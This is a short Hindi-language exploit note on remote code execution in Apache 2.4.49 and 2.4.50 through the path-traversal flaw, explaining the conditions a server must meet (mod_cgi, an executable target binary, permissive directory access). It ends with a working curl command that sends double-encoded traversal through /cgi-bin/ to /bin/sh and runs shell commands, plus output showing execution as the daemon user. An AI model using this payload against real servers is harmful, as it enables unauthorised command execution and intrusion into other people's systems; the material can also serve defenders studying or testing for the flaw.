
Apache सर्वरों के लिए रिमोट कोड निष्पादन शोषण। प्रभावित संस्करण: Apache 2.4.49, Apache 2.4.50
मेरी विनम्र राय में केवल "विशेष" सेटअप ही इस RCE के लिए संवेदनशील होंगे।
यही बात "आर्बिट्ररी फाइल रीड" शोषण पर भी लागू होती है जो आपने देखे हैं।
दोनों सीवीई वास्तव में लगभग एक ही पथ-ट्रैवर्सल कमज़ोरी हैं (दूसरा पहले वाले का अधूरा फिक्स है)।
पथ ट्रैवर्सल केवल मैप की गई URI से काम करता है (जैसे "Alias" या "ScriptAlias" Apache निर्देशों के माध्यम से)। केवल DocumentRoot पर्याप्त नहीं है।
"/cgi-bin/" डिफ़ॉल्ट रूप से मैप होता है (ScriptAlias) इसलिए इसका उपयोग पथ ट्रैवर्सल स्ट्रिंग से पहले किया जाता है।
इसके अलावा, ScriptAlias दिए गए निर्देशिका की सभी सामग्री को (फ़ाइल एक्सटेंशन की परवाह किए बिना) Apache के लिए Exec के रूप में चिह्नित करता है।
1/ mod_cgi सक्षम (डिफ़ॉल्ट नहीं लेकिन आसान)
2/ लक्ष्य बायनरी +x होनी चाहिए (/bin/sh के लिए डिफ़ॉल्ट)
3/ Apache अनुमतियाँ /bin या / के लिए प्रदान की गईं (डिफ़ॉल्ट नहीं और कठिन/अवास्तविक)
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)